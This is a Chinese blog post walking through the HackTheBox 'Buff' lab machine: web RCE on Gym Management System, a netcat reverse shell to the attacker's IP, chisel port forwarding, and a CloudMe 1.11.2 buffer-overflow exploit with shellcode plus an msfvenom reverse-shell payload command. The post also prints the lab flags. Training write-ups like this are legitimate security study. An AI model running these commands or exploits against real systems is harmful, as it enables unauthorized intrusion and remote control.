[Meachines] [Easy] Buff Gym-CMS-RCE+Chisel端口转发+CloudMe云文件存储-缓冲区溢出权限提升

于 2024-08-21 15:03:08 发布
阅读量74 收藏 1
点赞数 3
分类专栏: HackTheBox 文章标签: 运维
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141394101
版权

信息收集

IP AddressOpening Ports
10.10.10.198TCP:7680,8080

$ nmap -p- 10.10.10.198 --min-rate 1000 -sC -sV -Pn

PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Gym Management System RCE

image.png

$ gobuster dir -u http://10.10.10.198:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x php -t 50

image-2.png

image-1.png

https://projectworlds.in/

image-3.png

image-4.png

$ searchsploit Gym Management System

image-5.png

$ python2 48506.py http://10.10.10.198:8080/

image-6.png

User.txt

869a558cb1e1a7d53ec51402ba999b16

权限提升

nc上传目标

> curl -o %TEMP%\nc.exe http://10.10.16.24/nc.exe

> %TEMP%\nc.exe -e cmd 10.10.16.24 10034

image-10.png

C:\xampp\htdocs\gym\upload>netstat -ano

image-11.png

@echo off
setlocal
for /f "tokens=5" %%a in ('netstat -aon ^| findstr :8888') do (
    set PID=%%a
)
if defined PID (
    echo PID for port 8888: %PID%
    tasklist /v | findstr "%PID%"
) else (
    echo No process found using port 8888.
)
endlocal

开放端口8888的进程PID会不断的变化,所以需要一个bat脚本来快速查询

powershell > curl -o "$env:TEMP\find_port.bat" http://10.10.16.24/find_port.bat

powershell > Start-Process -FilePath "$env:TEMP\find_port.bat" -NoNewWindow -Wait

image-12.png

CloudMe.exe

image-13.png

版本为1.11.2

$ searchsploit CloudMe

image-14.png

端口转发

powershell > curl -o "$env:TEMP\chisel.exe" http://10.10.16.24/chisel.exe

powershell > Start-Process -FilePath "$env:TEMP\chisel.exe -h" -NoNewWindow -Wait

$ chisel server -port 8000 --reverse

image-15.png

CloudMe云文件存储-缓冲区溢出

image-16.png

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload =  b""
payload += b"\xda\xcf\xd9\x74\x24\xf4\x5b\xb8\x5c\xa8\x33"
payload += b"\x9e\x2b\xc9\xb1\x52\x83\xeb\xfc\x31\x43\x13"
payload += b"\x03\x1f\xbb\xd1\x6b\x63\x53\x97\x94\x9b\xa4"
payload += b"\xf8\x1d\x7e\x95\x38\x79\x0b\x86\x88\x09\x59"
payload += b"\x2b\x62\x5f\x49\xb8\x06\x48\x7e\x09\xac\xae"
payload += b"\xb1\x8a\x9d\x93\xd0\x08\xdc\xc7\x32\x30\x2f"
payload += b"\x1a\x33\x75\x52\xd7\x61\x2e\x18\x4a\x95\x5b"
payload += b"\x54\x57\x1e\x17\x78\xdf\xc3\xe0\x7b\xce\x52"
payload += b"\x7a\x22\xd0\x55\xaf\x5e\x59\x4d\xac\x5b\x13"
payload += b"\xe6\x06\x17\xa2\x2e\x57\xd8\x09\x0f\x57\x2b"
payload += b"\x53\x48\x50\xd4\x26\xa0\xa2\x69\x31\x77\xd8"
payload += b"\xb5\xb4\x63\x7a\x3d\x6e\x4f\x7a\x92\xe9\x04"
payload += b"\x70\x5f\x7d\x42\x95\x5e\x52\xf9\xa1\xeb\x55"
payload += b"\x2d\x20\xaf\x71\xe9\x68\x6b\x1b\xa8\xd4\xda"
payload += b"\x24\xaa\xb6\x83\x80\xa1\x5b\xd7\xb8\xe8\x33"
payload += b"\x14\xf1\x12\xc4\x32\x82\x61\xf6\x9d\x38\xed"
payload += b"\xba\x56\xe7\xea\xbd\x4c\x5f\x64\x40\x6f\xa0"
payload += b"\xad\x87\x3b\xf0\xc5\x2e\x44\x9b\x15\xce\x91"
payload += b"\x0c\x45\x60\x4a\xed\x35\xc0\x3a\x85\x5f\xcf"
payload += b"\x65\xb5\x60\x05\x0e\x5c\x9b\xce\x3b\xab\xb3"
payload += b"\x16\x54\xa9\xb3\x01\x93\x24\x55\x27\xcb\x60"
payload += b"\xce\xd0\x72\x29\x84\x41\x7a\xe7\xe1\x42\xf0"
payload += b"\x04\x16\x0c\xf1\x61\x04\xf9\xf1\x3f\x76\xac"
payload += b"\x0e\xea\x1e\x32\x9c\x71\xde\x3d\xbd\x2d\x89"
payload += b"\x6a\x73\x24\x5f\x87\x2a\x9e\x7d\x5a\xaa\xd9"
payload += b"\xc5\x81\x0f\xe7\xc4\x44\x2b\xc3\xd6\x90\xb4"
payload += b"\x4f\x82\x4c\xe3\x19\x7c\x2b\x5d\xe8\xd6\xe5"
payload += b"\x32\xa2\xbe\x70\x79\x75\xb8\x7c\x54\x03\x24"
payload += b"\xcc\x01\x52\x5b\xe1\xc5\x52\x24\x1f\x76\x9c"
payload += b"\xff\x9b\x86\xd7\x5d\x8d\x0e\xbe\x34\x8f\x52"
payload += b"\x41\xe3\xcc\x6a\xc2\x01\xad\x88\xda\x60\xa8"
payload += b"\xd5\x5c\x99\xc0\x46\x09\x9d\x77\x66\x18"


overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))       

buf = padding1 + EIP + NOPS + payload + overrun 

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(buf)
except Exception as e:
        print(sys.exc_value)

$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.16.24 LPORT=10039 -b '\x00\x0A\x0D' -f python -v payload

替换脚本shellcode

image-17.png

$ python exp.py

image-18.png

Root.txt

baf3f9d9a9c36a71e732becd0565cafb

Мартин.
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-buffgym渗透 & 端口转发& cloudme 缓冲区溢出
冬萍子癸水
01-17 1156
1、扫描 masscan快速全局扫,nmap具体扫。7680不知道,8080是web进去搜集信息。 C:\root> masscan -p1-65535,U:1-65535 10.10.10.198 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-01-17 09:36:41 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send
F - Fabricating Sculptures Gym - 102428F (dp + 前缀和维护)
weixin_58994718的博客
09-20 7435
题面: Miguel Angelo is a great sculptor, widely recognized for his outdoor sculptures. In his hometown, it is very common to find one of his creations in squares and gardens. People love his sculptures, not only for their beauty, but also because t...
CARLA平台+Q-learning的尝试(gym-carla)
蛋总的快乐生活
03-16 6411
接触强化学习大概有半年了,也了解了一些算法,一些简单的算法在gym框架也实现了,那么结合仿真平台Carla该怎么用呢?由于比较熟悉gym框架,就偷个懒先从这个开始写代码。 项目地址:https://github.com/cjy1992/gym-carla 文章目录一、环境配置1.1 基本配置1.2 配置工作环境1.3 运行测试二、环境解读2.1 test.py--超参数设置2.2 环境介绍2.2.1 动作空间2.2.2 状态空间2.2.3 test.py主函数2.3.4 Q-learning2.3..
ubuntu18.04 安装与运行 gym-gazebo
hongliyu_lvliyu的博客
06-04 1398
官网流程安装: https://github.com/erlerobot/gym-gazebo 一、环境与依赖 基本环境: ROS Melodic: Desktop-Full Install recommended, includes Gazebo 9.0.0 (http://wiki.ros.org/melodic/Installation/Ubuntu). Gazebo 9.0.0 ROS相关依赖: sudo apt-get install \ python-pip python3-vcst
gym-unrealcv:用于增强学习的虚幻环境
02-06
Gym-UnrealCV:用于视觉增强学习的逼真的虚拟世界介绍该项目将Unreal Engine与OpenAI Gym集成在一起,用于基于视觉增强学习。 在此项目中,您无需任何虚幻引擎和UnrealCV知识即可在各种现实的UE4环境中轻松运行RL...
gym-dmcontrol:围绕dm_control的包装器提供类似健身房的界面,反之亦然
04-27
**gym-dmcontrol** 是一个Python库,它为DeepMind Control Suite(dm_control)提供了一个与OpenAI Gym兼容的接口。这个库的目标是让研究人员和开发者能够在使用dm_control进行强化学习实验时,享受到与使用Gym环境...
working-gym-java-client:一个Java客户端来访问OpenAI Gym HTTP服务器
05-11
OPEN AI GYM HTTP服务器的JAVA CLIENT 一个访问简单Java客户端。 我试图寻找一个现有的Java客户端,但是我发现只有一个我无法上班,所以我决定自己做一个。 这个项目主要集中在简单性上,因此我将对依赖的依赖降到...
gym-minigrid:OpenAI Gym的简约gridworld软件包
04-29
简约的Gridworld环境(MiniGrid) 那里还有其他的gridworld Gym环境,但是该环境被设计为特别简单,轻巧和快速。 该代码几乎没有依赖项,因此不太可能破坏或无法安装。 它不加载外部精灵/纹理,并且可以在Core i7...
robo-gym-robot-servers:包含Robot Server ROS软件包的存储
05-01
robo-gym-robot-servers 包含Robot Server ROS软件包的存储库这些包装已经过ROS Melodic的测试(推荐)。 ROS Kinetic用户警告: 直到包含版本为止,Universal Robots环境与ROS Kinetic的兼容性一直保持。 在此版本...
运维自动化-配置平台】如何查看运营数据和审计
最新发布
腾讯蓝鲸智云官方博客
08-20 184
也可自定义新增视图,比如新增一个按厂商统计主机的:可以点击上下箭头调整图表展示位置说明:适合产品版本 V6.1/V6.2/V7.0/V7.1。
01 SSH--
m0_46671240的博客
08-19 225
SSH
【Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 658
本教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
模拟两台计算机的通讯-启动虚拟机(brctl+qemu组网)
simulate_create的博客
08-20 416
我们本次的目标是:vm-交换-vm。
深入理解Java虚拟机(类加载机制)
月伴飞鱼
08-20 522
类的初始化阶段是类加载过程的最后一个步骤,直到初始化阶段,JVM才真正开始执行类中编写的Java程序代码,将主导权移交给应用程序。相对于类加载过程的其他阶段,非数组类型的加载阶段(准确地说,是加载阶段中获取类的二进制字节流的动作)是开发人员可控性最强的阶段。如果数组的组件类型(Component Type,指的是数组去掉一个维度的类型,注意和前面的元素类型区分开来)是引用类型。验证阶段对于虚拟机的类加载机制来说,是一个非常重要的、但却不是必须要执行的阶段,因为验证阶段只有通过或者不通过的差别。
Linux网络设置
Lwc1027的博客
08-18 1206
根据pid查询5、查看端口查看网络配置的几个命令又ifconfig、hostname、route、netstat、ss,可以查看网卡,路由表还有统计信息,可以直接指定查询需要的指令。
CORS error && 302 Found
zcxbd的博客
08-19 161
单点登录认证:访问A系统,在B系统登录认证此处代码为A系统。
Git使用SSH安全访问远程仓库
Java/Python大数据成长之路
08-17 786
HTTP本身不安全,因为传输的数据未经加密,可能会被窃听或篡改,为了解决这个问题,引入了HTTPS,即在HTTP上增加了SSL/TLS协议,为数据传输提供了加密、完整性校验和身份验证。相比于HTTPS,SSH协议更加安全,可以使用密钥对进行身份验证。通过使用SSH密钥对,可以确保数据在传输时受到加密保护,并提供了更高的安全性:SSH密钥对为所有Git操作提供了更安全的身份验证。在使用SSH连接远程Git存储库时,我们可以使用SSH密钥对来确保安全性。现在,我们可以通过SSH连接到远程Git存储库。
SSH服务器拒绝了密码,请再输入一次
SU19920923的博客
08-16 198
如果没有安装vim,使用sudo apt-get install vim命令安装vim。添加一条:PasswordAuthentication yes。如果不是root用户,切换用户或者在命令前面加上sudo。1、输入vim /etc/ssh/sshd_config。2、修改Authentication下配置。
pip install git+https://github.com/tawnkramer/gym-donkeycar
05-12
这个命令是安装一个名为"gym-donkeycar"的Python包,其源代码托管在GitHub的tawnkramer/gym-donkeycar仓库中。它使得您可以在OpenAI Gym环境中使用Donkey Car模拟器进行强化学习。 要执行此命令,请先确保您已经安装了Python和pip,并在终端或命令提示符窗口中输入该命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值